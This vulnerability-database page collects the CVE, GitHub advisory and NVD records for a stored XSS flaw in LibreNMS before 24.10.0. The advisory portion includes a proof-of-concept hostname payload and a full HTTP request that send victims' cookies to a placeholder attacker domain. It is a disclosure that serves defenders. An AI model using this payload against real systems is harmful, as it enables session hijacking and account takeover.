cvelistv5 - cve-2024-49764

CVE-2024-49764 (GCVE-0-2024-49764)

Vulnerability from cvelistv5 – Published: 2024-11-15 15:27 – Updated: 2024-11-15 16:50

Summary

LibreNMS is an open-source, PHP/MySQL/SNMP-based network monitoring system. A Stored Cross-Site Scripting (XSS) vulnerability in the "Capture Debug Information" page allows authenticated users to inject arbitrary JavaScript through the "hostname" parameter when creating a new device. This vulnerability results in the execution of malicious code when the "Capture Debug Information" page is visited, redirecting the user and sending non-httponly cookies to an attacker-controlled domain. This vulnerability is fixed in 24.10.0.

Severity ?

4.8 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

CWE

CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/librenms/librenms/security/adv…	x_refsource_CONFIRM
	https://github.com/librenms/librenms/commit/af15e…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	librenms	librenms	Affected: < 24.10.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "librenms",
            "vendor": "librenms",
            "versions": [
              {
                "lessThan": "24.10.0",
                "status": "affected",
                "version": "0",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-49764",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-11-15T16:47:58.784107Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-15T16:50:01.534Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "librenms",
          "vendor": "librenms",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 24.10.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "LibreNMS is an open-source, PHP/MySQL/SNMP-based network monitoring system. A Stored Cross-Site Scripting (XSS) vulnerability in the \"Capture Debug Information\" page allows authenticated users to inject arbitrary JavaScript through the \"hostname\" parameter when creating a new device. This vulnerability results in the execution of malicious code when the \"Capture Debug Information\" page is visited, redirecting the user and sending non-httponly cookies to an attacker-controlled domain. This vulnerability is fixed in 24.10.0."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 4.8,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "HIGH",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-11-15T15:27:52.199Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/librenms/librenms/security/advisories/GHSA-rmr4-x6c9-jc68",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/librenms/librenms/security/advisories/GHSA-rmr4-x6c9-jc68"
        },
        {
          "name": "https://github.com/librenms/librenms/commit/af15eabbb1752985d36f337cecf137a947e170f6",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/librenms/librenms/commit/af15eabbb1752985d36f337cecf137a947e170f6"
        }
      ],
      "source": {
        "advisory": "GHSA-rmr4-x6c9-jc68",
        "discovery": "UNKNOWN"
      },
      "title": "LibreNMS has a Stored XSS (\u0027Cross-site Scripting\u0027) in librenms/includes/html/pages/device/capture.inc.php"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2024-49764",
    "datePublished": "2024-11-15T15:27:52.199Z",
    "dateReserved": "2024-10-18T13:43:23.456Z",
    "dateUpdated": "2024-11-15T16:50:01.534Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "fkie_nvd": {
      "configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:*\", \"versionEndExcluding\": \"24.10.0\", \"matchCriteriaId\": \"B4BD88D2-5DA7-450B-AEFA-33BCA61685A7\"}]}]}]",
      "descriptions": "[{\"lang\": \"en\", \"value\": \"LibreNMS is an open-source, PHP/MySQL/SNMP-based network monitoring system. A Stored Cross-Site Scripting (XSS) vulnerability in the \\\"Capture Debug Information\\\" page allows authenticated users to inject arbitrary JavaScript through the \\\"hostname\\\" parameter when creating a new device. This vulnerability results in the execution of malicious code when the \\\"Capture Debug Information\\\" page is visited, redirecting the user and sending non-httponly cookies to an attacker-controlled domain. This vulnerability is fixed in 24.10.0.\"}, {\"lang\": \"es\", \"value\": \"LibreNMS es un sistema de monitoreo de red de c\\u00f3digo abierto basado en PHP/MySQL/SNMP. Una vulnerabilidad de cross site scripting (XSS) almacenado en la p\\u00e1gina \\\"Capturar informaci\\u00f3n de depuraci\\u00f3n\\\" permite a los usuarios autenticados inyectar c\\u00f3digo JavaScript arbitrario a trav\\u00e9s del par\\u00e1metro \\\"nombre de host\\\" al crear un nuevo dispositivo. Esta vulnerabilidad da como resultado la ejecuci\\u00f3n de c\\u00f3digo malicioso cuando se visita la p\\u00e1gina \\\"Capturar informaci\\u00f3n de depuraci\\u00f3n\\\", redirigiendo al usuario y enviando cookies que no son solo http a un dominio controlado por el atacante. Esta vulnerabilidad se corrigi\\u00f3 en 24.10.0.\"}]",
      "id": "CVE-2024-49764",
      "lastModified": "2024-11-20T14:40:02.630",
      "metrics": "{\"cvssMetricV31\": [{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N\", \"baseScore\": 4.8, \"baseSeverity\": \"MEDIUM\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"HIGH\", \"userInteraction\": \"REQUIRED\", \"scope\": \"CHANGED\", \"confidentialityImpact\": \"LOW\", \"integrityImpact\": \"LOW\", \"availabilityImpact\": \"NONE\"}, \"exploitabilityScore\": 1.7, \"impactScore\": 2.7}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\", \"baseScore\": 5.4, \"baseSeverity\": \"MEDIUM\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"LOW\", \"userInteraction\": \"REQUIRED\", \"scope\": \"CHANGED\", \"confidentialityImpact\": \"LOW\", \"integrityImpact\": \"LOW\", \"availabilityImpact\": \"NONE\"}, \"exploitabilityScore\": 2.3, \"impactScore\": 2.7}]}",
      "published": "2024-11-15T16:15:35.323",
      "references": "[{\"url\": \"https://github.com/librenms/librenms/commit/af15eabbb1752985d36f337cecf137a947e170f6\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/librenms/librenms/security/advisories/GHSA-rmr4-x6c9-jc68\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Exploit\", \"Vendor Advisory\"]}]",
      "sourceIdentifier": "security-advisories@github.com",
      "vulnStatus": "Analyzed",
      "weaknesses": "[{\"source\": \"security-advisories@github.com\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-79\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2024-49764\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-11-15T16:15:35.323\",\"lastModified\":\"2024-11-20T14:40:02.630\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"LibreNMS is an open-source, PHP/MySQL/SNMP-based network monitoring system. A Stored Cross-Site Scripting (XSS) vulnerability in the \\\"Capture Debug Information\\\" page allows authenticated users to inject arbitrary JavaScript through the \\\"hostname\\\" parameter when creating a new device. This vulnerability results in the execution of malicious code when the \\\"Capture Debug Information\\\" page is visited, redirecting the user and sending non-httponly cookies to an attacker-controlled domain. This vulnerability is fixed in 24.10.0.\"},{\"lang\":\"es\",\"value\":\"LibreNMS es un sistema de monitoreo de red de c\u00f3digo abierto basado en PHP/MySQL/SNMP. Una vulnerabilidad de cross site scripting (XSS) almacenado en la p\u00e1gina \\\"Capturar informaci\u00f3n de depuraci\u00f3n\\\" permite a los usuarios autenticados inyectar c\u00f3digo JavaScript arbitrario a trav\u00e9s del par\u00e1metro \\\"nombre de host\\\" al crear un nuevo dispositivo. Esta vulnerabilidad da como resultado la ejecuci\u00f3n de c\u00f3digo malicioso cuando se visita la p\u00e1gina \\\"Capturar informaci\u00f3n de depuraci\u00f3n\\\", redirigiendo al usuario y enviando cookies que no son solo http a un dominio controlado por el atacante. Esta vulnerabilidad se corrigi\u00f3 en 24.10.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N\",\"baseScore\":4.8,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":1.7,\"impactScore\":2.7},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\",\"baseScore\":5.4,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.3,\"impactScore\":2.7}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"24.10.0\",\"matchCriteriaId\":\"B4BD88D2-5DA7-450B-AEFA-33BCA61685A7\"}]}]}],\"references\":[{\"url\":\"https://github.com/librenms/librenms/commit/af15eabbb1752985d36f337cecf137a947e170f6\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/librenms/librenms/security/advisories/GHSA-rmr4-x6c9-jc68\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"cna\": {\"title\": \"LibreNMS has a Stored XSS (\u0027Cross-site Scripting\u0027) in librenms/includes/html/pages/device/capture.inc.php\", \"problemTypes\": [{\"descriptions\": [{\"cweId\": \"CWE-79\", \"lang\": \"en\", \"description\": \"CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)\", \"type\": \"CWE\"}]}], \"metrics\": [{\"cvssV3_1\": {\"attackComplexity\": \"LOW\", \"attackVector\": \"NETWORK\", \"availabilityImpact\": \"NONE\", \"baseScore\": 4.8, \"baseSeverity\": \"MEDIUM\", \"confidentialityImpact\": \"LOW\", \"integrityImpact\": \"LOW\", \"privilegesRequired\": \"HIGH\", \"scope\": \"CHANGED\", \"userInteraction\": \"REQUIRED\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N\", \"version\": \"3.1\"}}], \"references\": [{\"name\": \"https://github.com/librenms/librenms/security/advisories/GHSA-rmr4-x6c9-jc68\", \"tags\": [\"x_refsource_CONFIRM\"], \"url\": \"https://github.com/librenms/librenms/security/advisories/GHSA-rmr4-x6c9-jc68\"}, {\"name\": \"https://github.com/librenms/librenms/commit/af15eabbb1752985d36f337cecf137a947e170f6\", \"tags\": [\"x_refsource_MISC\"], \"url\": \"https://github.com/librenms/librenms/commit/af15eabbb1752985d36f337cecf137a947e170f6\"}], \"affected\": [{\"vendor\": \"librenms\", \"product\": \"librenms\", \"versions\": [{\"version\": \"\u003c 24.10.0\", \"status\": \"affected\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2024-11-15T15:27:52.199Z\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"LibreNMS is an open-source, PHP/MySQL/SNMP-based network monitoring system. A Stored Cross-Site Scripting (XSS) vulnerability in the \\\"Capture Debug Information\\\" page allows authenticated users to inject arbitrary JavaScript through the \\\"hostname\\\" parameter when creating a new device. This vulnerability results in the execution of malicious code when the \\\"Capture Debug Information\\\" page is visited, redirecting the user and sending non-httponly cookies to an attacker-controlled domain. This vulnerability is fixed in 24.10.0.\"}], \"source\": {\"advisory\": \"GHSA-rmr4-x6c9-jc68\", \"discovery\": \"UNKNOWN\"}}, \"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-49764\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-11-15T16:47:58.784107Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:*\"], \"vendor\": \"librenms\", \"product\": \"librenms\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"lessThan\": \"24.10.0\", \"versionType\": \"custom\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-11-15T16:48:43.202Z\"}}]}",
      "cveMetadata": "{\"cveId\": \"CVE-2024-49764\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"state\": \"PUBLISHED\", \"assignerShortName\": \"GitHub_M\", \"dateReserved\": \"2024-10-18T13:43:23.456Z\", \"datePublished\": \"2024-11-15T15:27:52.199Z\", \"dateUpdated\": \"2024-11-15T16:50:01.534Z\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

GHSA-RMR4-X6C9-JC68

Vulnerability from github – Published: 2024-11-15 15:27 – Updated: 2024-11-15 20:49

Summary

LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/includes/html/pages/device/capture.inc.php

Details

Summary

A Stored Cross-Site Scripting (XSS) vulnerability in the "Capture Debug Information" page allows authenticated users to inject arbitrary JavaScript through the "hostname" parameter when creating a new device. This vulnerability results in the execution of malicious code when the "Capture Debug Information" page is visited, redirecting the user and sending non-httponly cookies to an attacker-controlled domain.

Details

When creating a new device, an attacker can inject the following XSS payload into the "hostname" parameter:

test'" autofocus onfocus="document.location='https://<attacker_domain>/logger.php?c='+document.cookie"

(Note: You may need to URL-encode the '+' sign in the payload.)

The payload triggers automatically when visiting the "Capture Debug Information" page for the device, redirecting the user's browser to the attacker-controlled domain along with any non-httponly cookies.

The vulnerability is due to insufficient sanitization of the "url" variable before it is output in the HTML. This is evident in the following lines of code:

https://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/includes/html/pages/device/capture.inc.php#L55

PoC

Create a new device with the following payload in the "hostname" parameter:

test'" autofocus onfocus="document.location='https://<attacker_domain>/logger.php?c='+document.cookie"

Save the device.
Navigate to the "Capture Debug Information" page for the device.
Observe that the injected script triggers and redirects the user to the attacker's domain, sending cookies.

Example Request:

POST /addhost HTTP/1.1
Host: <your_host>
Content-Type: application/x-www-form-urlencoded
Cookie: <your_cookie>

_token=<your_token>&hostname=test%27%22+autofocus+onfocus%3D%22document.location%3D%27https%3A%2F%2F<attacker_domain>%2Flogger.php%3Fc%3D%27%2bdocument.cookie%22&snmp=on&sysName=&hardware=&os=&os_id=&snmpver=v2c&port=&transport=udp&port_assoc_mode=ifIndex&community=&authlevel=noAuthNoPriv&authname=&authpass=&authalgo=SHA&cryptopass=&cryptoalgo=AES&force_add=on&Submit=

Impact

This vulnerability allows authenticated users to execute arbitrary JavaScript in the context of other users' sessions when they visit the "Capture Debug Information" page of the device. The attacker can redirect the user to a malicious domain and capture non-httponly cookies, potentially compromising the user's account and allowing unauthorized actions.

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 24.9.1"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "librenms/librenms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "24.10.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-49764"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-11-15T15:27:42Z",
    "nvd_published_at": "2024-11-15T16:15:35Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nA Stored Cross-Site Scripting (XSS) vulnerability in the \"Capture Debug Information\" page allows authenticated users to inject arbitrary JavaScript through the \"hostname\" parameter when creating a new device. This vulnerability results in the execution of malicious code when the \"Capture Debug Information\" page is visited, redirecting the user and sending non-httponly cookies to an attacker-controlled domain.\n\n### Details\nWhen creating a new device, an attacker can inject the following XSS payload into the \"hostname\" parameter:\n\n```\ntest\u0027\" autofocus onfocus=\"document.location=\u0027https://\u003cattacker_domain\u003e/logger.php?c=\u0027+document.cookie\"\n```\n\n(Note: You may need to URL-encode the \u0027+\u0027 sign in the payload.)\n\nThe payload triggers automatically when visiting the \"Capture Debug Information\" page for the device, redirecting the user\u0027s browser to the attacker-controlled domain along with any non-httponly cookies.\n\nThe vulnerability is due to insufficient sanitization of the \"url\" variable before it is output in the HTML. This is evident in the following lines of code:\n\nhttps://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/includes/html/pages/device/capture.inc.php#L55\n\n### PoC\n1. Create a new device with the following payload in the \"hostname\" parameter:\n```\ntest\u0027\" autofocus onfocus=\"document.location=\u0027https://\u003cattacker_domain\u003e/logger.php?c=\u0027+document.cookie\"\n```\n2. Save the device.\n3. Navigate to the \"Capture Debug Information\" page for the device.\n4. Observe that the injected script triggers and redirects the user to the attacker\u0027s domain, sending cookies.\n\nExample Request:\n```http\nPOST /addhost HTTP/1.1\nHost: \u003cyour_host\u003e\nContent-Type: application/x-www-form-urlencoded\nCookie: \u003cyour_cookie\u003e\n\n_token=\u003cyour_token\u003e\u0026hostname=test%27%22+autofocus+onfocus%3D%22document.location%3D%27https%3A%2F%2F\u003cattacker_domain\u003e%2Flogger.php%3Fc%3D%27%2bdocument.cookie%22\u0026snmp=on\u0026sysName=\u0026hardware=\u0026os=\u0026os_id=\u0026snmpver=v2c\u0026port=\u0026transport=udp\u0026port_assoc_mode=ifIndex\u0026community=\u0026authlevel=noAuthNoPriv\u0026authname=\u0026authpass=\u0026authalgo=SHA\u0026cryptopass=\u0026cryptoalgo=AES\u0026force_add=on\u0026Submit=\n```\n\n### Impact\n\nThis vulnerability allows authenticated users to execute arbitrary JavaScript in the context of other users\u0027 sessions when they visit the \"Capture Debug Information\" page of the device. The attacker can redirect the user to a malicious domain and capture non-httponly cookies, potentially compromising the user\u0027s account and allowing unauthorized actions.",
  "id": "GHSA-rmr4-x6c9-jc68",
  "modified": "2024-11-15T20:49:49Z",
  "published": "2024-11-15T15:27:42Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/librenms/librenms/security/advisories/GHSA-rmr4-x6c9-jc68"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-49764"
    },
    {
      "type": "WEB",
      "url": "https://github.com/librenms/librenms/commit/af15eabbb1752985d36f337cecf137a947e170f6"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/librenms/librenms"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "LibreNMS has a Stored XSS (\u0027Cross-site Scripting\u0027) in librenms/includes/html/pages/device/capture.inc.php"
}

FKIE_CVE-2024-49764

Vulnerability from fkie_nvd - Published: 2024-11-15 16:15 - Updated: 2024-11-20 14:40

Severity ?

4.8 (Medium) - CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
5.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/librenms/librenms/commit/af15eabbb1752985d36f337cecf137a947e170f6	Patch
	security-advisories@github.com	https://github.com/librenms/librenms/security/advisories/GHSA-rmr4-x6c9-jc68	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	librenms	librenms	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "B4BD88D2-5DA7-450B-AEFA-33BCA61685A7",
              "versionEndExcluding": "24.10.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "LibreNMS is an open-source, PHP/MySQL/SNMP-based network monitoring system. A Stored Cross-Site Scripting (XSS) vulnerability in the \"Capture Debug Information\" page allows authenticated users to inject arbitrary JavaScript through the \"hostname\" parameter when creating a new device. This vulnerability results in the execution of malicious code when the \"Capture Debug Information\" page is visited, redirecting the user and sending non-httponly cookies to an attacker-controlled domain. This vulnerability is fixed in 24.10.0."
    },
    {
      "lang": "es",
      "value": "LibreNMS es un sistema de monitoreo de red de c\u00f3digo abierto basado en PHP/MySQL/SNMP. Una vulnerabilidad de cross site scripting (XSS) almacenado en la p\u00e1gina \"Capturar informaci\u00f3n de depuraci\u00f3n\" permite a los usuarios autenticados inyectar c\u00f3digo JavaScript arbitrario a trav\u00e9s del par\u00e1metro \"nombre de host\" al crear un nuevo dispositivo. Esta vulnerabilidad da como resultado la ejecuci\u00f3n de c\u00f3digo malicioso cuando se visita la p\u00e1gina \"Capturar informaci\u00f3n de depuraci\u00f3n\", redirigiendo al usuario y enviando cookies que no son solo http a un dominio controlado por el atacante. Esta vulnerabilidad se corrigi\u00f3 en 24.10.0."
    }
  ],
  "id": "CVE-2024-49764",
  "lastModified": "2024-11-20T14:40:02.630",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 4.8,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "HIGH",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 1.7,
        "impactScore": 2.7,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 5.4,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.3,
        "impactScore": 2.7,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2024-11-15T16:15:35.323",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/librenms/librenms/commit/af15eabbb1752985d36f337cecf137a947e170f6"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/librenms/librenms/security/advisories/GHSA-rmr4-x6c9-jc68"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2024-49764 (GCVE-0-2024-49764)

GHSA-RMR4-X6C9-JC68

Summary

Details

PoC

Impact

FKIE_CVE-2024-49764

Tags

Sightings

Nomenclature